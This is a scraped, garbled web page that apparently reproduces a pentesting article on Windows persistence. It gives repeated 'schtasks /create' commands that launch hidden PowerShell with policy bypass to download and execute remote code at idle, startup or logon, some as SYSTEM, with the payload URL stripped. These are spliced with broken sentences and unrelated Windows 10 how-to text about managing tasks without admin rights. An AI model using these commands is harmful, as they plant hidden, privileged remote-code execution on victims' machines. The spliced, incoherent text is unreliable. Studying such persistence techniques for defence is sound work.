![]() The “schtasks” utility provides the necessary options as it is part of its functionality. Schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onidle /i 30Įxecution of the payload can be also occur at a specific time and can have an expiration date and a self delete function. Schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onstart /ru System Schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onlogon /ru System ![]() Schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onidle /i 30 Scheduled Task You will only need to ensure that the task which you tell the schtasks to execute (i.e. It won't require you to open the console as Administrator.Schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onstart /ru System This means that you can enable or disable it from a regular (non-elevated) PowerShell or command prompt. In this case, the task will inherit you privileges, and can be managed without escalating your access rights. It is worth mentioning that administrative privileges are not required if you want to enable or disable a task is created under your current user account in Windows 10. Provide the full task path in the library if required, and the task name you want to enable.
0 Comments
Leave a Reply. |